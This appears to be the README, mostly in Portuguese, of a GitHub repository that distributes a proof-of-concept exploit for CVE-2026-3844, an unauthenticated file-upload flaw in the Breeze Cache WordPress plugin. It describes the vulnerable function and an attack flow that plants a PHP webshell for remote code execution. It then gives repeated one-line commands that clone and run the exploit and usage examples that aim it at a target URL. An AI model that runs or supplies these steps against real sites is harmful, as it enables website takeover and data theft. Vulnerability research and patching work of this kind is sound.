
Exploit de PoC para CVE-2026-3844, uma vulnerabilidade crítica de upload de arquivos não autenticado no plugin WordPress Breeze que leva a RCE.
Exploit PoC para CVE-2026-3844, uma vulnerabilidade crítica de upload de arquivo sem autenticação no plugin Breeze do WordPress que leva a RCE.
CVE-2026-3844 é uma vulnerabilidade CRÍTICA de upload arbitrário de arquivo sem autenticação no plugin Breeze Cache do WordPress (da Cloudways), afetando todas as versões até 2.4.4 inclusive.
Este repositório fornece um exploit de Prova de Conceito (PoC) (CVE-2026-3844.py) para pesquisas de segurança autorizadas, testes de penetração e divulgação responsável.
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3
| Campo | Detalhes |
|---|---|
| ID CVE | CVE-2026-3844 |
| Plugin | Breeze Cache (da Cloudways) |
| Versões Afetadas | Todas as versões ≤ 2.4.4 |
| Versão Corrigida | Breeze 2.4.5+ |
| Tipo de Vulnerabilidade | CWE-434 — Upload irrestrito de arquivo com tipo perigoso |
| Pontuação CVSS v3.1 | 9.8 (CRÍTICO) |
| Pontuação CVSS v2.0 | 10.0 (CRÍTICO) |
| Vetor CVSS | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Vetor de Ataque | Rede (Remoto) |
| Autenticação Necessária | ❌ Nenhuma — Não autenticado |
| Condição | "Host Files Locally – Gravatars" deve estar habilitado (desabilitado por padrão) |
| Impacto | Confidencialidade: ALTA · Integridade: ALTA · Disponibilidade: ALTA |
| Publicado | 2026-04-23 |
| Fonte | Wordfence / NVD / MITRE |
| PoC | Tausif Zaman |
O plugin Breeze Cache para WordPress busca imagens Gravatar remotas e as armazena localmente quando o recurso "Host Files Locally – Gravatars" está habilitado. A função vulnerável fetch_gravatar_from_remote em class-breeze-cache-cronjobs.php (linhas 89–119) não realiza nenhuma validação de tipo de arquivo ou extensão no conteúdo remoto obtido.
class-breeze-cache-cronjobs.php
└── fetch_gravatar_from_remote() ← ❌ No file type validation
└── Saves remote content directly to disk
└── Attacker controls → uploads .php webshell → RCE
Attacker (Unauthenticated)
│
▼
Craft malicious HTTP request with PHP webshell URL as Gravatar
│
▼
Plugin fetches & saves the .php file without validation
│
▼
Webshell stored on server (e.g., /wp-content/breeze-cache/evil.php)
│
▼
Attacker accesses webshell → Full RCE achieved
Se explorada com sucesso, um atacante pode:
requests# Clone the repository
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3 CVE-2026-3844.py
# Navigate into the directory
cd CVE-2026-3844
# Install dependencies
pip install -r requirements.txt
# Run the exploit
python3 CVE-2026-3844.py
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip install -r requirements.txt
python CVE-2026-3844.py
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip3 install -r requirements.txt
python3 CVE-2026-3844.py
pkg install python git -y && git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py
python3 CVE-2026-3844.py
usage: CVE-2026-3844.py [-h] -u URL [-t TIMEOUT] [-o OUTPUT] [-v]
CVE-2026-3844 — Breeze Cache WordPress Plugin Arbitrary File Upload PoC
optional arguments:
-h, --help Show this help message and exit
-u URL, --url URL Target URL (e.g. https://target.com)
-t TIMEOUT Request timeout in seconds (default: 10)
-o OUTPUT Save webshell path to output file
-v, --verbose Enable verbose/debug output
# Basic usage
python3 CVE-2026-3844.py -u https://vulnerable-site.com
# Verbose mode
python3 CVE-2026-3844.py -u https://vulnerable-site.com -v
# Custom timeout
python3 CVE-2026-3844.py -u https://vulnerable-site.com -t 20 -v